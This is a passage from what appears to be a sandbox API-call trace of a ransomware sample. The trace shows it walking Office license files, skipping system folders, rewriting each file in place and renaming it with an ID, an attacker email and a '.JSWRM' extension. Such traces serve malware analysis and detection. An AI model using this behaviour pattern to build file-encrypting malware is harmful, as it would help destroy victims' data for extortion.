hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0105.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.597] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe664edb3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe664edb3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe688b059, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", cAlternateFileName="O31D4D~1.XRM")) returned 1 [0105.597] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.597] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.597] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.597] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.597] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.597] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.597] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.597] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.597] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.597] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0105.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0105.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0105.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0105.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0105.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0105.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0105.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.598] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11630) returned 1 [0105.598] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0105.598] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0105.600] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.601] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0105.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.601] CloseHandle (hObject=0x45c) returned 1 [0105.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0105.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0105.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0105.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0105.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0105.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0105.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.601] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0105.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0105.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0105.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.602] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6628a99, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6628a99, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe66e76b1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial3-pl.xrm-ms", cAlternateFileName="O31B86~1.XRM")) returned 1 [0105.602] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-pl.xrm-ms", lpString2=".") returned 1 [0105.602] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-pl.xrm-ms", lpString2="..") returned 1 [0105.602] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-pl.xrm-ms", lpString2="...") returned 1 [0105.602] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-pl.xrm-ms", lpString2="windows") returned -1 [0105.602] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-pl.xrm-ms", lpString2="recovery") returned -1 [0105.602] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.602] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.602] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.602] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.602] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-pl.xrm-ms", lpString2="msocache") returned 1 [0105.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0105.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0105.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0105.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0105.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0105.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0105.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0105.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.603] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0105.603] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0105.603] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.606] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.606] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.607] CloseHandle (hObject=0x45c) returned 1 [0105.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0105.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0105.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0105.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0105.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0105.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0105.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.607] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0105.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0105.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0105.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.608] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e0e778, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6e0e778, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6ecd3ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f31, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial3-ppd.xrm-ms", cAlternateFileName="O3569A~1.XRM")) returned 1 [0105.608] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpString2=".") returned 1 [0105.608] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpString2="..") returned 1 [0105.608] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpString2="...") returned 1 [0105.608] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpString2="windows") returned -1 [0105.608] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.608] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.608] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.608] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.608] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.608] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0105.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0105.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0105.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0105.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0105.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0105.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0105.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.609] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24369) returned 1 [0105.609] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f30) returned 0x24c1d0 [0105.609] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5f30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5f30, lpOverlapped=0x0) returned 1 [0105.614] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.614] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5f30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5f30, lpOverlapped=0x0) returned 1 [0105.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.614] CloseHandle (hObject=0x45c) returned 1 [0105.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0105.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0105.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 